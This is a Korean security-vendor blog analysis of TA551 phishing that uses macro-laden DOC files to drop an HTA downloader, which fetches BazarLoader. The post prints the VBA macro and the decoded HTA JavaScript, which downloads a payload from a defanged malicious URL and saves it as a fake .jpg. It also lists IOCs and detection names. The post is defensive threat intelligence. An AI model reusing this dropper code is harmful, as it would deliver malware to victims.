지속적으로 변형유포되는 악성 DOC 매크로 – TA551 동향 (2)

ASEC 분석팀에서는 TA551 그룹에서 공격에 사용한 DOC 매크로 문서들에 대해 지속적으로 소개하고 있다. 지난 7월에 소개한 내용과 매크로 문서의 동작방식은 달라진 것이 없으나, 이번에는 매크로 실행 후 최종단계에서 BazarLoader 를 유포하는 정황이 확인되었다.

그림 1) TA551 그룹에서 유포하는 악성DOC 매크로의 동작방식

먼저, 자사에서 지난 5 월에 발행한 BazarLoader 분석보고서의 일부 내용을 인용하면 아래와 같다.

ATIP – BazarLoader 분석보고서 ‘개요’ 부분발췌

BazarLoader는 메모리 상에서 백도어를 다운로드하고 정상 프로세스에 인젝션하는 악성코드로, C++언어를 기반으로 만들어졌으며 주로 x64 실행파일 형태로 유포되고 있다. BazarLoader가 다운로드하는 악성코드는 ‘BazarBackdoor’라 불리며, 이 백도어는 사용자 PC 정보 및 기업환경 정보를 수집하여 기업인 경우 다른 악성코드를 다운받는 다운로더 기능을 수행한다. 해외 감염 사례로는 ‘코발트 스트라이크(CobaltStrike)’를 설치해 측면 이동(Lateral Movement) 및 추가 정보를 수집하였으며, 최종적으로 ‘Ryuk Ransomware’나 ‘Conti Ransomware’를 설치해 해당 기업에 금액을 요구한다. BazarLoader와 BazarBackdoor는 *.bazar 라는 C2 도메인을 사용하여 ‘Bazar’라는 이름이 붙여졌다.

이번에 유포된 피싱메일은 아래와 같이 특별한 내용을 포함하지는 않으나, 이번에도 DOC 파일을 암호화 압축하여 첨부한 것을 알 수 있다.

그림 2) DOC 파일을 암호화 압축한 피싱메일(1)
그림 3) DOC 파일을 암호화 압축한 피싱메일(2)

8월 말부터 유포되기 시작한 DOC 파일명은 아래 표와 같다. 파일명을 확인해보면 현재까지의 유포동향과 모두 동일하게 ‘[특정단어].[날짜].doc’의 형태로 하이픈(-)과 콤마(,)를 혼용하여 다수의 파일을 유포하였다. 또한, 지난번 유포와는 다르게 DOC 파일의 매크로 실행 후 드랍되는 HTA 파일은 1.hta로 모두 동일한 것을 알 수 있었다.

표 1) 워드(*.doc) / HTA / 추가로 내려받는 악성코드의 파일명
그림 4) DOC 파일의 매크로코드 일부 (1.hta)

이번에는 워드 파일에서 매크로가 허용될 시 드랍되는 HTA 파일에서도 약간의 변형이 확인되었다. 워드 파일의 동작 방식은 이전과 동일하다. 워드 파일을 실행했을 때 확인되는 매크로 이미지도 동일하고 특별한 내용은 없어보이지만, 매크로가 허용되면 그림 뒤에 숨겨진 텍스트를 기반으로 HTA 파일이 생성되는 방식이다.

그림 5) 워드파일 실행화면
그림 6) 흰색의 1pt 로 매크로 허용유도 이미지 뒤에 숨겨진 텍스트

매크로 코드를 확인해보면 아래와 같이 워드 본문의 내용을 토대로 C:\ProgramData\1.hta 로 드랍하는 것을 알 수 있다. 즉, 본문에서 반복적으로 확인되는 rki9 를 지우고 HTA파일을 생성하는 것으로 확인된다. 두번째 코드로 첨부한 내용은 그렇게 생성된 ‘1.hta’ 파일의 일부 내용을 추가 복호화 로직에 따라 나타낸 것이다. HTA 파일이 실행되면 외부URL에서 다운로더로 동작할 추가 악성코드를 내려받으며, 이 파일은 코드 끝부분에서 확인되는 devDivEx.jpg 가 된다.

Sub document_open()
init "c:\programdata\1.hta", Replace(ActiveDocument.Content, "rki9", "")
End Sub
var devDriveDoc = new ActiveXObject('msxml2.xmlhttp');
devDriveDoc.open('GET', 'hxxp://brookscargos[.]com/bmdff/kEMjHpH/npksoRQONwZUsnmvGS2Nl0DvMefQPvsyQ/QECxpCU6vz7EPQJgBj/yixySDbVkH6K5ihCTO9BY3Jj2n/iDiNtaKeMOKMXULwdjN3gnitjUdm6i3OQlLqgqOiz/1tvjGdIcS/iIx9AM3zw9hq6rW3/73053/galax9?q=RuId5tt5BDbkCLPzTeSR&ref=Pt3zxKAEB8&id=PCCEA', false);
devDriveDoc.send();
if (devDriveDoc.status == 200) {
	try {
		var docExDir = new ActiveXObject('adodb.stream');
		docExDir.open;
		docExDir.type = 1;
		docExDir.write(devDriveDoc.responsebody);
		docExDir.savetofile('c:\\users\\public\\devDivEx.jpg', 2);
		docExDir.close;
	} catch (e) {
	}
}

여기에서 jpg 확장자로 내려받아지는 파일이 BazarLoader DLL 로 확인되었다. 현재는 BazarLoader 가 추가로 내려받을 수 있는 악성코드의 네트워크가 비활성화 된 관계로 재현은 어려우나 자사 인프라를 통해서 Trickbot 을 로드하여 동작했던 것을 알 수 있다.

사용자들은 출처가 불분명한 메일의 첨부파일 실행을 자제하고, 만약 첨부파일을 다운로드 받았을 경우에는 매크로 실행(허용)을 지양해야한다. 문서 프로그램의 보안 설정이 낮은 경우에는 별도의 경고 문구 없이 바로 매크로가 실행되기 때문에, 사용자는 보안 설정을 높음 수준으로 유지하여 의도치 않은 기능이 실행되지 않도록 주의가 필요하다.

또한, 사용하고 있는 안티바이러스 제품의 엔진 패턴 버전을 최신으로 업데이트하여 사용할 것을 권장한다.

안랩 V3 제품군에서는 본문에서 소개한 유형의 악성 파일들(DOC, HTA, DLL 등)에 대해 아래와 같이 진단하고 있다.

[파일 진단]
Downloader/DOC.TA551
Downloader/DOC.TA551.S*
Downloader/MSOffice.Agent
Downloader/HTA.TA551
Trojan/Win.BazarLoader.R440111
Trojan/Win.CryptLoader.R440284

[IOC]
409491f78930a4f26581ebd9a6ecaa2e
bc8073f5646ad6a1bc1be76e556250eb
7ccb728af8c2ce3b5202ce94eaffc770
hxxp://beltmorgand[.]com
hxxp://entiredelivery2014b[.]com
hxxp://povertymanagement2018b[.]com

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

4.8 4 votes
별점 주기
Subscribe
Notify of
guest

1 댓글
Inline Feedbacks
View all comments
유성준
유성준
1 year ago

안녕하세요.
DOC 매크로 악성코드에 대해서 찾다가 방문하였습니다. 예시를 보여주셔서 많은 도움이 되고 있습니다.
한가지 궁금한게 있습니다. 워드에 매크로를 포함해서 저장하려면 확장자가 docm이여야 하는 걸로 알고 있는데 실제 악성파일은 doc 확장자를 갖는데 어떻게 매크로가 유지가 되는지 궁금합니다.

감사합니다.